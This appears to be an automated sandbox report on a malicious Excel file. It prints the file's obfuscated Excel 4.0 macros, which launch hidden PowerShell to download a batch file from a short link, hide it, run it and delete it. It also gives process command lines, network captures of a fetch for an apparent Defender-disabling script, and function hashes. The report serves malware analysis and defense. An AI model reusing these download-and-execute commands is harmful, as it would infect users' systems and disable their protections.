                          Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                          Macro 4.0 Code

                          ,,,,,,,112,,,,,,"=GET.CELL(5,L581)",,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")",,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")",,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")",,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/3js2g8s','pd""&CHAR(46)&""bat')"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 6, 2021 08:43:17.414120913 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.454320908 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.454463005 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.564639091 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.604691029 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.608035088 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.608057022 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.608068943 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.608164072 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.615248919 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.655251026 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.655450106 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.706046104 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.711529970 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.751588106 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.876657009 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.876677036 CET44349765104.22.0.232192.168.2.4
                          Jan 6, 2021 08:43:17.876764059 CET49765443192.168.2.4104.22.0.232
                          Jan 6, 2021 08:43:17.881860018 CET4976680192.168.2.437.46.150.139
                          Jan 6, 2021 08:43:17.928843021 CET804976637.46.150.139192.168.2.4
                          Jan 6, 2021 08:43:17.928937912 CET4976680192.168.2.437.46.150.139
                          Jan 6, 2021 08:43:17.929109097 CET4976680192.168.2.437.46.150.139
                          Jan 6, 2021 08:43:17.991918087 CET804976637.46.150.139192.168.2.4
                          Jan 6, 2021 08:43:18.034055948 CET4976680192.168.2.437.46.150.139
                          Jan 6, 2021 08:43:20.413064957 CET4976680192.168.2.437.46.150.139
                          Jan 6, 2021 08:43:20.414120913 CET49765443192.168.2.4104.22.0.232

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Jan 6, 2021 08:41:07.530632973 CET4991053192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:07.578370094 CET53499108.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:09.204250097 CET5585453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:09.252154112 CET53558548.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:10.202636957 CET6454953192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:10.258775949 CET53645498.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:11.411150932 CET6315353192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:11.459152937 CET53631538.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:17.322022915 CET5299153192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:17.378077984 CET53529918.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:18.493443966 CET5370053192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:18.557493925 CET53537008.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:18.710490942 CET5172653192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:18.758403063 CET53517268.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:18.954689026 CET5679453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:19.015211105 CET53567948.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:19.970416069 CET5679453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:20.041555882 CET53567948.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:20.122245073 CET5653453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:20.178483009 CET53565348.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:20.977931976 CET5679453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:21.034677029 CET53567948.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:22.668016911 CET5662753192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:22.718770027 CET53566278.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:22.995039940 CET5679453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:23.051367998 CET53567948.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:25.870685101 CET5662153192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:25.923449993 CET53566218.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:27.025991917 CET5679453192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:27.082200050 CET53567948.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:31.294339895 CET6311653192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:31.342226028 CET53631168.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:32.352514982 CET6407853192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:32.403234005 CET53640788.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:33.410626888 CET6480153192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:33.466900110 CET53648018.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:34.443291903 CET6172153192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:34.499492884 CET53617218.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:35.122282982 CET5125553192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:35.172902107 CET53512558.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:41.620734930 CET6152253192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:41.681299925 CET53615228.8.8.8192.168.2.4
                          Jan 6, 2021 08:41:56.044537067 CET5233753192.168.2.48.8.8.8
                          Jan 6, 2021 08:41:56.121562004 CET53523378.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:11.803592920 CET5504653192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:11.859992981 CET53550468.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:12.103574038 CET4961253192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:12.175160885 CET53496128.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:14.008213997 CET4928553192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:14.064517021 CET53492858.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:15.842648983 CET5060153192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:15.901946068 CET53506018.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:17.137531996 CET6087553192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:17.188205957 CET53608758.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:18.567492008 CET5644853192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:18.623631954 CET53564488.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:19.767375946 CET5917253192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:19.827318907 CET53591728.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:22.509234905 CET6242053192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:22.536746979 CET6057953192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:22.565562010 CET53624208.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:22.593647957 CET53605798.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:27.805545092 CET5018353192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:27.864104986 CET53501838.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:31.809824944 CET6153153192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:31.860646009 CET53615318.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:33.365293026 CET4922853192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:33.424521923 CET53492288.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:51.043240070 CET5979453192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:51.091136932 CET53597948.8.8.8192.168.2.4
                          Jan 6, 2021 08:42:55.292176008 CET5591653192.168.2.48.8.8.8
                          Jan 6, 2021 08:42:55.348661900 CET53559168.8.8.8192.168.2.4
                          Jan 6, 2021 08:43:17.350286961 CET5275253192.168.2.48.8.8.8
                          Jan 6, 2021 08:43:17.401124001 CET53527528.8.8.8192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                          Jan 6, 2021 08:43:17.350286961 CET192.168.2.48.8.8.80x9b01Standard query (0)cutt.lyA (IP address)IN (0x0001)

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                          Jan 6, 2021 08:43:17.401124001 CET8.8.8.8192.168.2.40x9b01No error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                          Jan 6, 2021 08:43:17.401124001 CET8.8.8.8192.168.2.40x9b01No error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
                          Jan 6, 2021 08:43:17.401124001 CET8.8.8.8192.168.2.40x9b01No error (0)cutt.ly104.22.1.232A (IP address)IN (0x0001)

                          HTTP Request Dependency Graph

                          • 37.46.150.139

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          0192.168.2.44976637.46.150.13980C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          TimestampkBytes transferredDirectionData
                          Jan 6, 2021 08:43:17.929109097 CET4640OUTGET /bat/scriptxls_cf6c45a3-4840-422a-8668-e9a12252c924_thecabal1_wddisabler.bat HTTP/1.1
                          Host: 37.46.150.139
                          Connection: Keep-Alive
                          Jan 6, 2021 08:43:17.991918087 CET4641INHTTP/1.1 200 OK
                          Date: Wed, 06 Jan 2021 07:43:17 GMT
                          Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
                          Last-Modified: Tue, 05 Jan 2021 05:36:46 GMT
                          ETag: "0-5b82097a9c220"
                          Accept-Ranges: bytes
                          Content-Length: 0
                          Keep-Alive: timeout=5, max=100
                          Connection: Keep-Alive
                          Content-Type: application/x-msdownload


                          HTTPS Packets

                          TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                          Jan 6, 2021 08:43:17.608068943 CET104.22.0.232443192.168.2.449765CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USSat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                          CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=USCN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=USThu Nov 02 13:24:33 CET 2017Tue Nov 02 13:24:33 CET 2027

                          Code Manipulations

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          Analysis Process: EXCEL.EXE PID: 7136 Parent PID: 800

                          General

                          Start time:08:41:17
                          Start date:06/01/2021
                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                          Wow64 process (32bit):true
                          Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                          Imagebase:0xc70000
                          File size:27110184 bytes
                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 3984 Parent PID: 7136

                          General

                          Start time:08:41:21
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 1368 Parent PID: 7136

                          General

                          Start time:08:41:21
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 1380 Parent PID: 3984

                          General

                          Start time:08:41:21
                          Start date:06/01/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 6084 Parent PID: 7136

                          General

                          Start time:08:41:21
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 5952 Parent PID: 1368

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 5980 Parent PID: 3984

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
                          Imagebase:0xd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 6360 Parent PID: 7136

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 5008 Parent PID: 6084

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 4344 Parent PID: 1368

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
                          Imagebase:0xd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Chronological Activities

                          Analysis Process: cmd.exe PID: 584 Parent PID: 7136

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\cmd.exe
                          Wow64 process (32bit):true
                          Commandline:cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
                          Imagebase:0x11d0000
                          File size:232960 bytes
                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 2804 Parent PID: 6360

                          General

                          Start time:08:41:22
                          Start date:06/01/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 4832 Parent PID: 6084

                          General

                          Start time:08:41:23
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
                          Imagebase:0xd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET
                          Reputation:high

                          Chronological Activities

                          Analysis Process: conhost.exe PID: 5704 Parent PID: 584

                          General

                          Start time:08:41:23
                          Start date:06/01/2021
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff724c50000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 6376 Parent PID: 6360

                          General

                          Start time:08:41:23
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
                          Imagebase:0xd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: powershell.exe PID: 6496 Parent PID: 584

                          General

                          Start time:08:41:24
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):true
                          Commandline:powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/3js2g8s','pd.bat')
                          Imagebase:0xd0000
                          File size:430592 bytes
                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Chronological Activities

                          Analysis Process: attrib.exe PID: 1020 Parent PID: 4832

                          General

                          Start time:08:43:11
                          Start date:06/01/2021
                          Path:C:\Windows\SysWOW64\attrib.exe
                          Wow64 process (32bit):true
                          Commandline:'C:\Windows\system32\attrib.exe' +s +h pd.bat
                          Imagebase:0x1360000
                          File size:19456 bytes
                          MD5 hash:A5540E9F87D4CB083BDF8269DEC1CFF9
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Chronological Activities

                          Disassembly

                          Code Analysis

                          Reset < >

                            Analysis Process: powershell.exe PID: 5980 Parent PID: 3984 powershell.exeCOMMON

                            Executed Functions

                            Function 03410040, Relevance: 2.1, Strings: 1, Instructions: 807COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.926670172.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: #
                            • API String ID: 0-1885708031
                            • Opcode ID: 4f3ef696b98ddff98b9da296fdc4de5955df53988ffefa673d694f276db8beb2
                            • Instruction ID: 91287a1a4b32fd4101c10832c3bf68de42703c3e99c52cd6118b60d54f4b8fe3
                            • Opcode Fuzzy Hash: 4f3ef696b98ddff98b9da296fdc4de5955df53988ffefa673d694f276db8beb2
                            • Instruction Fuzzy Hash: C1821674A00218CFDB25DF25D894BA9BBB2FF48305F1484AAE90AAB351DB759DC1CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0341AC20, Relevance: 1.2, Instructions: 1232COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.926670172.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e68e69fdb0be1a564cd3ce53a77dec9b1952b4cc17ffa83ba74c48d54d7e1c43
                            • Instruction ID: d80f72726e7aeb9a9d4606e85192e32d8c12b1bd2bc19cad169125e97a8f10dc
                            • Opcode Fuzzy Hash: e68e69fdb0be1a564cd3ce53a77dec9b1952b4cc17ffa83ba74c48d54d7e1c43
                            • Instruction Fuzzy Hash: 0DB2A074A00619CFCB25DF64D894BAEBBB2FF89304F1484AAD9059B3A0CB349D91CF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 03466353, Relevance: .6, Instructions: 645COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000006.00000002.927449765.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb53d201cbabc38b6477c4ad6b8a534804ff8b8ccc06604bc32cda54ac60587d
                            • Instruction ID: 30f82e838d14167388108eb309600aadac128af996d07911d3b4e95c75d894ba
                            • Opcode Fuzzy Hash: eb53d201cbabc38b6477c4ad6b8a534804ff8b8ccc06604bc32cda54ac60587d
                            • Instruction Fuzzy Hash: C5527D34A01219CFDB24DF64D854BAEBBB2FF89304F1585AAD809AB390DB359D81CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 03464650, Relevance: 2.8, Strings: 2, Instructions: 342COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.927449765.0000000003460000.00000040.00000001.sdmp, Offset: 03460000, based on PE: false
                            Similarity
                            • API ID:
                            • String ID: "$h? f
                            • API String ID: 0-790041044
                            • Opcode ID: 9f0b9f37e6cbdddcdd6e8943f942ed90ffd4fe3c22096f5295e1d6349ff6c8a3
                            • Instruction ID: 04366735ff8ca5c6b97a77a16cfbf85851103f9a2d92243b828236ea97b09b65
                            • Opcode Fuzzy Hash: 9f0b9f37e6cbdddcdd6e8943f942ed90ffd4fe3c22096f5295e1d6349ff6c8a3
                            • Instruction Fuzzy Hash: C9E1F734A002089FDB04DFA5D944BAEB7F6EF88304F1585AAD905AF391DB72AD05CF61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04EC6661, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04EC66D8
                            Memory Dump Source
                            • Source File: 00000006.00000002.931278738.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: false
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: d15a1e48d1b3fe9bbdee7e3c1a4ea0753c4cbebffff3173be5c08fb36025886c
                            • Instruction ID: ecba2c6733832ec04cd6abc2c569adce352c4e15e83b2b17c41ebb0029b7f672
                            • Opcode Fuzzy Hash: d15a1e48d1b3fe9bbdee7e3c1a4ea0753c4cbebffff3173be5c08fb36025886c
                            • Instruction Fuzzy Hash: 051133B5D006199BCB10CFAAD944ADEFBB4FB48724F10851AD818A7640D778A941CFE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04EC565C, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNELBASE(00000000), ref: 04EC66D8
                            Memory Dump Source
                            • Source File: 00000006.00000002.931278738.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: false
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: 11217dc62818c39ca3e8363ca9ef0e244e1263bf1d846aef9830224a0f22b188
                            • Instruction ID: 4083e071a858c0910ab216aa9c48d1a4181f4870971de52590888662d996a180
                            • Opcode Fuzzy Hash: 11217dc62818c39ca3e8363ca9ef0e244e1263bf1d846aef9830224a0f22b188
                            • Instruction Fuzzy Hash: 902133B5D006199BCB10CFAAD544B9EFBB4FB48714F10851AD918B7300D778A905CFE5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0341D220, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • RtlDecodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,0341DD2A), ref: 0341DFB7
                            Memory Dump Source
                            • Source File: 00000006.00000002.926670172.0000000003410000.00000040.00000001.sdmp, Offset: 03410000, based on PE: false
                            Similarity
                            • API ID: DecodePointer
                            • String ID:
                            • API String ID: 3527080286-0
                            • Opcode ID: 487048d4e6d39eae5b10a9de95d1c30fbc53105beefd91ed0b6f74f8db8f3bd6
                            • Instruction ID: d981984bce3759566d210c424608a431e787c61db5d8acd68a74df0c62c998c6
                            • Opcode Fuzzy Hash: 487048d4e6d39eae5b10a9de95d1c30fbc53105beefd91ed0b6f74f8db8f3bd6
                            • Instruction Fuzzy Hash: 351143B58007488FCB20CF99D488BDEFBF8EB49224F10845AD518AB240D375AA48CFA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0341D22C, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                            • RtlDecodePointer.NTDLL(00000000,?,?,?,?,?,?,?,?,?,0341DD2A), ref: 0341DFB7
                            Memory Dump Source
